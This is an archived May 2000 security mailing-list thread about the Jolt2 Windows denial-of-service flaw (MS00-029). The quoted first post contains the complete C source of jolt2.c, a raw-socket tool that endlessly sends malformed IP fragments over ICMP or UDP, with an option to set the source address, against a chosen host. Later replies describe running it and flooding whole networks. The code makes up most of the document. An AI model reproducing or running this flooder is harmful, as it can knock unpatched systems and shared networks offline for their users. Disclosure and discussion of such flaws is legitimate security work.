OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Windows DoS code (jolt2.c)
From: Craig Williams (craig.williamsHOOKRISE.COM)
Date: Fri May 26 2000 - 09:10:49 CDT

I had the same result, in testing out internal 10meg lan took
a beating while the code was running.

This can do serious damage to NT Web Servers !

Does this code only attack one port ? It appears to allow a port
to be specified -

What is the concept behind this exploit ?

Craig

> -----Original Message-----
> From: SMILER [mailto:smilerVXD.ORG]
> Sent: 26 May 2000 14:12
> To: win2ksecadviceLISTSERV.NTSECURITY.NET
> Subject: Re: Windows DoS code (jolt2.c)
>
>
> This code does more then taking a windoze box to it knees !!
> Well I am in a
> network where we´ve got a 128k link and I used my shell
> account in the ISP
> with a really fast link to jolt one of the machines in my
> network. As soon
> as I pressed ENTER I lost connectivity in the whole
> network...I couldn´t
> even try to stop the jolt...fortunately I had a backup isdn
> connection that
> I used to stop the process !! Amazing flood !!!
> My point is...how could I protect my network from beeing
> flooded by someone
> using such a powerfull tool ?? Even if I use a packet filter
> in the entering
> of my network I get flooded cause my router will get 100%
> inbound traffic !!
> The only way that I can think of is asking my provider to re-route the
> traffic from the jolt source to a "dead-end" somehow ! Any
> suggestions ?
>
> smilervxd.org
>
> ----- Original Message -----
> From: Steve <steveSECURESOLUTIONS.ORG>
> To: <win2ksecadviceLISTSERV.NTSECURITY.NET>
> Sent: Thursday, May 25, 2000 9:48 PM
> Subject: Windows DoS code (jolt2.c)
>
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Here is some proof of concept code for the Jolt2 DoS reported by
> > BindView Razor Team (http://razor.bindview.com). Note, this code was
> > not created by me, I am simply passing it on to the mailing list.
> > Send all questions/problems to the author of the code,
> > phonixmoocow.org
> >
> > Regards;
> >
> > Steve Manzuik
> > Moderator
> >
> > - --------------snip----------------
> >
> >
> >
> > /*
> > * File: jolt2.c
> > * Author: Phonix <phonixmoocow.org>
> > * Date: 23-May-00
> > *
> > * Description: This is the proof-of-concept code for the
> > * Windows denial-of-serice attack described by
> > * the Razor team (NTBugtraq, 19-May-00)
> > * (MS00-029). This code causes cpu utilization
> > * to go to 100%.
> > *
> > * Tested against: Win98; NT4/SP5,6; Win2K
> > *
> > * Written for: My Linux box. YMMV. Deal with it.
> > *
> > * Thanks: This is standard code. Ripped from lots of places.
> > * Insert your name here if you think you wrote some of
> > * it. It's a trivial exploit, so I won't take credit
> > * for anything except putting this file together.
> > */
> >
> > #include <stdio.h>
> > #include <string.h>
> > #include <netdb.h>
> > #include <sys/socket.h>
> > #include <sys/types.h>
> > #include <netinet/in.h>
> > #include <netinet/ip.h>
> > #include <netinet/ip_icmp.h>
> > #include <netinet/udp.h>
> > #include <arpa/inet.h>
> > #include <getopt.h>
> >
> > struct _pkt
> > {
> > struct iphdr ip;
> > union {
> > struct icmphdr icmp;
> > struct udphdr udp;
> > } proto;
> > char data;
> > } pkt;
> >
> > int icmplen = sizeof(struct icmphdr),
> > udplen = sizeof(struct udphdr),
> > iplen = sizeof(struct iphdr),
> > spf_sck;
> >
> > void usage(char *pname)
> > {
> > fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
> > pname);
> > fprintf (stderr, "Note: UDP used if a port is specified, otherwise
> > ICMP\n");
> > exit(0);
> > }
> >
> > u_long host_to_ip(char *host_name)
> > {
> > static u_long ip_bytes;
> > struct hostent *res;
> >
> > res = gethostbyname(host_name);
> > if (res == NULL)
> > return (0);
> > memcpy(&ip_bytes, res->h_addr, res->h_length);
> > return (ip_bytes);
> > }
> >
> > void quit(char *reason)
> > {
> > perror(reason);
> > close(spf_sck);
> > exit(-1);
> > }
> >
> > int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
> > {
> > int bs, psize;
> > unsigned long x;
> > struct sockaddr_in to;
> >
> > to.sin_family = AF_INET;
> > to.sin_port = 1235;
> > to.sin_addr.s_addr = dst_addr;
> >
> > if (port)
> > psize = iplen + udplen + 1;
> > else
> > psize = iplen + icmplen + 1;
> > memset(&pkt, 0, psize);
> >
> > pkt.ip.version = 4;
> > pkt.ip.ihl = 5;
> > pkt.ip.tot_len = htons(iplen + icmplen) + 40;
> > pkt.ip.id = htons(0x455);
> > pkt.ip.ttl = 255;
> > pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
> > pkt.ip.saddr = src_addr;
> > pkt.ip.daddr = dst_addr;
> > pkt.ip.frag_off = htons (8190);
> >
> > if (port)
> > {
> > pkt.proto.udp.source = htons(port|1235);
> > pkt.proto.udp.dest = htons(port);
> > pkt.proto.udp.len = htons(9);
> > pkt.data = 'a';
> > } else {
> > pkt.proto.icmp.type = ICMP_ECHO;
> > pkt.proto.icmp.code = 0;
> > pkt.proto.icmp.checksum = 0;
> > }
> >
> > while (1) {
> > bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
> > sizeof(struct sockaddr));
> > }
> > return bs;
> > }
> >
> > int main(int argc, char *argv[])
> > {
> > u_long src_addr, dst_addr;
> > int i, bs=1, port=0;
> > char hostname[32];
> >
> > if (argc < 2)
> > usage (argv[0]);
> >
> > gethostname (hostname, 32);
> > src_addr = host_to_ip(hostname);
> >
> > while ((i = getopt (argc, argv, "s:p:h")) != EOF)
> > {
> > switch (i)
> > {
> > case 's':
> > dst_addr = host_to_ip(optarg);
> > if (!dst_addr)
> > quit("Bad source address given.");
> > break;
> >
> > case 'p':
> > port = atoi(optarg);
> > if ((port <=0) || (port > 65535))
> > quit ("Invalid port number given.");
> > break;
> >
> > case 'h':
> > default:
> > usage (argv[0]);
> > }
> > }
> >
> > dst_addr = host_to_ip(argv[argc-1]);
> > if (!dst_addr)
> > quit("Bad destination address given.");
> >
> > spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
> > if (!spf_sck)
> > quit("socket()");
> > if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
> > sizeof(bs)) < 0)
> > quit("IP_HDRINCL");
> >
> > do_frags (spf_sck, src_addr, dst_addr, port);
> > }
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGPfreeware 6.5.3 for non-commercial use
<http://www.pgp.com>
>
> iQA/AwUBOS2ReDV9eGvIXwM6EQLOzgCgqF+8K+s95q7PXp6WE6HXFJVKXgMAn1ek
> IAkI+Hv0ul66TxRmIJP1LqRH
> =sSSM
> -----END PGP SIGNATURE-----
>
> _____________________________________________________________________
> ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
> ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
> SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
>

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net